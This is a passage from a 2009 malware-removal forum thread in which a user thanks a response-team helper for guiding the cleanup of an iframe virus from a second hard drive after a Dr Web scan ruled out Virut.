Although it can bring repairs the value of that Dr Web scan for your scenario was more to verify that Virut/Vitro is not involved there. If from the little you got accomplished it did not locate any then we really should be moving forward here, so yes, go ahead with the remainder of the steps suggested.
Ad eundum quo no duck ante iit

#7 Straydog

  • Topic Starter

  • Members
  • 13 posts
  • Gender:Male
  • Local time:10:24 PM

Posted 07 August 2009 - 06:49 PM

This is to inform that with the excellent help provided right from the first reply and following the recommended steps, I could clean my computer completely from the <iframe> virus.

Reformatting the OS HD would be an easy task, but the virus was on a second HD with my own files, and the OS was not affected. It was a heavy job, but the last thing I wanted was to format the HD with my files.

Thank you for the help, Jintan.

This thread is closed for me.

#8 Jintan


  • Malware Response Team
  • 531 posts
  • Local time:06:24 PM

Posted 09 August 2009 - 07:55 PM

I appreciate you coming back and posting the update Straydog. Be well.
Ad eundum quo no duck ante iit

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users